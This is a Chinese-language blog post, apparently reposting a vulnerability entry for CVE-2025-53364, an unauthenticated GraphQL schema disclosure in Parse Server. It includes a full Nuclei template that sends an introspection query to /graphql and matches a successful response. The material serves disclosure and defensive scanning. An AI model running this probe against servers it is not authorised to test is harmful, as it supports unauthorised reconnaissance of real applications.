Parse Server GraphQL Schema Information Disclosure Vulnerability

漏洞信息

漏洞名称: Parse Server GraphQL Schema Information Disclosure Vulnerability

漏洞编号:

  • CVE: CVE-2025-53364

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: Parse Server是一个开源的后端框架,支持多种平台,包括Web、移动设备和IoT设备,广泛用于快速开发和部署应用程序。它提供了一个GraphQL API,用于数据查询和操作。此次发现的漏洞涉及GraphQL schema的信息泄露问题。GraphQL schema是GraphQL API的核心部分,定义了可查询的数据类型和操作。由于Parse Server的GraphQL API在默认配置下允许未授权的访问,攻击者无需提供会话令牌或主密钥即可获取schema的元数据。这种信息泄露可能暴露应用程序的内部结构,为攻击者提供后续攻击的线索。漏洞的技术根源在于缺乏对GraphQL schema访问的适当认证控制。虽然这种漏洞不直接导致数据泄露或服务中断,但它增加了应用程序被进一步攻击的风险。攻击者可以利用泄露的schema信息来识别潜在的弱点,如未受保护的查询或突变,从而发起更复杂的攻击。因此,建议在生产环境中禁用GraphQL schema的自省功能,或实施严格的认证机制来控制对schema的访问。

产品厂商: parseplatform

产品名称: parse-server

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8def1ee5badd4b285681dbecede8b512634526cc/http%2Fcves%2F2025%2FCVE-2025-53364.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

id: CVE-2025-53364

info:
  name: Parse Server - GraphQL Schema Information Disclosure
  author: securitytaters
  severity: medium
  description: |
    Parse Server contains a GraphQL schema information disclosure vulnerability. The GraphQL API allows public access to the schema without requiring a session token or the master key, potentially exposing metadata that could expand the attack surface.
  impact: |
    An attacker can retrieve GraphQL schema metadata without authentication, potentially revealing application structure and expanding the attack surface for subsequent attacks.
  remediation: |
    Disable GraphQL schema introspection in production environments or implement proper authentication controls for schema access.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-53364
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: parseplatform
    product: parse-server
  reference:
    - https://parseplatform.org
    - https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53364
  tags: cve,cve2025,parse,parseplatform,graphql,info-disclosure
  
http:
  - method: POST
    path:
      - "{{BaseURL}}/graphql"

    headers:
      X-Parse-Application-Id: test
      Content-Type: application/json
        
    body: '{"query":"{\n  __schema {\n    types {\n      name\n    }\n  }\n}"}'
    
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data":{"__schema":{"types":[{"name":"Upload"},'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
Parse Server GraphQL Schema Information Disclosure Vulnerability
http://example.com/2025/07/22/github_1411237641/
作者
lianccc
发布于
2025年7月22日
许可协议